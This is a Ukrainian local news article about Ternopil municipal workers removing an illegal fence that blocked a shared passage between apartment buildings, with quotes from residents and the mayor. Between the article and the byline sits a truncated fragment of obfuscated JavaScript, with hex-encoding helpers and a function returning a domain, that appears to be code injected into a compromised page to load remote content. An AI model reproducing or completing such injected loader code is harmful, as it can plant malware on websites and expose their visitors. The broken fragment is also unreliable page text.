Ви знаходитесь: Головна / Новини / На проспекті Злуки демонтували «камінь спотикання» між мешканцями кількох будинків

На проспекті Злуки демонтували «камінь спотикання» між мешканцями кількох будинків

На проспекті Злуки комунальники таки демонтували самовільно встановлену огорожу, через яку побили горщики сусіди одразу кількох будинків. В міській раді сподіваються, що конфлікт на цьому вичерпаний.

Кілька днів біля «Універсаму» не вщухає конфлікт між мешканцями будинків на  проспекті Злуки, 8 та кількох сусідніх на вул. Галицькій. Останні пояснюють, незадоволені тим, що прохід, яким роками користувалися люди – перекрили. І ходити доводиться в обхід.

п. МАРІЯ, мешканка одного з будинків на вул. Галицька

«На роботу, діти до школи, в садочки, магазин, стоматологія, це спеціально зробили арку для нас.  А тепер їх не задовольняє то, бо ми ходимо. Взяли повалили всі сходи, замурували, загородили… Роблять, що хочуть».

ОЛЬГА, мешканка одного з будинків на вул. Галицька

«Навіть, з їхніх будинків мами приходили під наш будинок, бо в нас тихіше, з дітьми в колясках. Ми ж їх не виганяли і ми їм не говорили. Чому проблема в 20 метрах? Добре, якщо ви так хочете, боїтеся за своїх дітей, вони сказали, що важкі сходи, то візьміть собі зробіть майданчик з отакенними воротами і поставте на код, на ключик, а нам лишіть тих 20 метрів, які ми просимо. Невже настільки, тих 20 метрів стали такою роздорою?».

Розмовляти з нами на камеру мешканці будинку на проспекті Злуки,8 – відмовилися. За кадром, сказали, що не розуміють в чому проблема. Оскільки, пройти до арки через їхній двір можна і біля брами, що за кількадесят метрів від сходів. Натомість, люди, які вже не один десяток років прожили в цьому районі, кажуть, коли мали будувати будинок з аркою, через прохідну зону, до них приходили за відповідною згодою, яку вони і дали.

п. МАРІЯ, мешканка одного з будинків на вул. Галицька

«І ми всі дали згоду, коли вже побудували, не знаю, як і шо, тут певне, голова будинку є.. Але цілу площу вони собі окупували, як часний сектор. Сходи повалили, охрану мають, машини, гараж. А землі ніхто… Вони в оренду взяли».

Миритися із забарикадованим проходом люди не збиралися і вдалися до більш радикальних методів. Вирішили перекрити дорогу на проспекті Злуки. Вимагали негайного демонтажу огорожі. Вгамувати протестувальників взявся міський голова, який приїхав на місце події. Сергій Надал запевнив людей, що на засіданні виконкому приймуть рішення щодо незаконно встановленої огорожі. Сьогодні, близько 10 ранку комунальники її демонтували.

СЕРГІЙ НАДАЛ, міський голова Тернополя

«Сьогодні було прийняте рішення про демонтаж незаконної огорожі, яка перешкоджає спільному проходу. На сьогоднішній день роботи вже всі виконані. Незаконної огорожі, яка заважала вільному проходу – зрізали. Тобто, те, що ми обіцяли людям, та робота є проведеною».

І аби подібні «війни» між сусідами не повторилися, міська рада на черговій сесії планує прийняти нові правила благоустрою у місті. Де окремим пунктом заборонять зводити огорожі на території спільного користування.

СЕРГІЙ НАДАЛ, міський голова Тернополя

«В даному випадку, через прибудинкову територію є спільний прохід, прохід спільного використання, які використовують мешканці багатьох сусідніх будинків, взагалі, мешканці Тернополя. Тому, буде також рекомендовано, при прийнятті всіх інших рішень, про закріплення землі на ОСББ, окремо прописувати рядком, що територія спільного користування. Зобов’язати або заключати сервітути або залишати вільним для спільного проходу, спільного користування».

До слова, наступна сесія міськради відбудеться вже наступного тижня, в четвер 16 червня.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "intb.te.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top